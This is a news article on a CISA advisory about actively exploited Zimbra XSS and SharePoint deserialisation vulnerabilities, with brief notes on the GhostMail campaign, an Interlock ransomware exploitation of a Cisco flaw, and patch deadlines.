CISA Alerts on Active Exploitation of Zimbra and SharePoint Vulnerabilities
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent advisory to federal agencies and organizations regarding the active exploitation of critical vulnerabilities in Synacor’s Zimbra Collaboration Suite (ZCS) and Microsoft’s Office SharePoint. These security flaws pose significant risks, including unauthorized access and potential data breaches.
Details of the Vulnerabilities:
1. Zimbra Collaboration Suite (ZCS) Vulnerability (CVE-2025-66376):
– Severity: Rated at 7.2 on the CVSS scale.
– Description: This stored cross-site scripting (XSS) vulnerability resides in the Classic UI of ZCS. Attackers can exploit this flaw by embedding malicious Cascading Style Sheets (CSS) @import directives within an HTML email. When such an email is opened in a vulnerable ZCS webmail session, it triggers the exploit.
– Patch Information: Zimbra addressed this issue in versions 10.0.18 and 10.1.13, released in November 2025.
2. Microsoft Office SharePoint Vulnerability (CVE-2026-20963):
– Severity: Rated at 8.8 on the CVSS scale.
– Description: This vulnerability involves the deserialization of untrusted data, allowing unauthorized attackers to execute arbitrary code over a network.
– Patch Information: Microsoft released a fix for this flaw in January 2026.
Exploitation in the Wild:
The inclusion of CVE-2025-66376 in CISA’s Known Exploited Vulnerabilities (KEV) catalog follows reports from cybersecurity firm Seqrite Labs. They detailed a campaign, dubbed Operation GhostMail, targeting Ukraine’s State Hydrographic Service. In this operation, attackers sent socially engineered emails without malicious attachments or links. Instead, the emails contained obfuscated JavaScript payloads within the HTML body, exploiting the ZCS vulnerability upon opening. The malware harvested credentials, session tokens, two-factor authentication recovery codes, browser-saved passwords, and mailbox contents from the past 90 days, exfiltrating the data via DNS and HTTPS.
While specific details regarding the exploitation of CVE-2026-20963 remain scarce, the potential for unauthorized code execution underscores the critical need for immediate patching.
Recommendations:
In response to these active threats, CISA mandates that Federal Civilian Executive Branch (FCEB) agencies:
– For CVE-2025-66376: Apply the necessary patches by April 1, 2026.
– For CVE-2026-20963: Implement the fixes by March 23, 2026.
Organizations are urged to prioritize these updates to mitigate the risk of exploitation.
Additional Threats:
In a related development, Amazon has disclosed that threat actors associated with the Interlock ransomware have been exploiting a critical vulnerability in Cisco’s firewall management software (CVE-2026-20131, CVSS score: 10.0) since January 26, 2026. This exploitation began over a month before the vulnerability was publicly disclosed, highlighting the urgency for organizations to stay vigilant and proactive in their cybersecurity measures.
Conclusion:
The active exploitation of these vulnerabilities in widely used platforms like Zimbra and SharePoint serves as a stark reminder of the evolving cyber threat landscape. Organizations must remain proactive by regularly updating their systems, monitoring for unusual activities, and educating employees about potential phishing tactics. Timely application of security patches is crucial to safeguarding sensitive information and maintaining operational integrity.
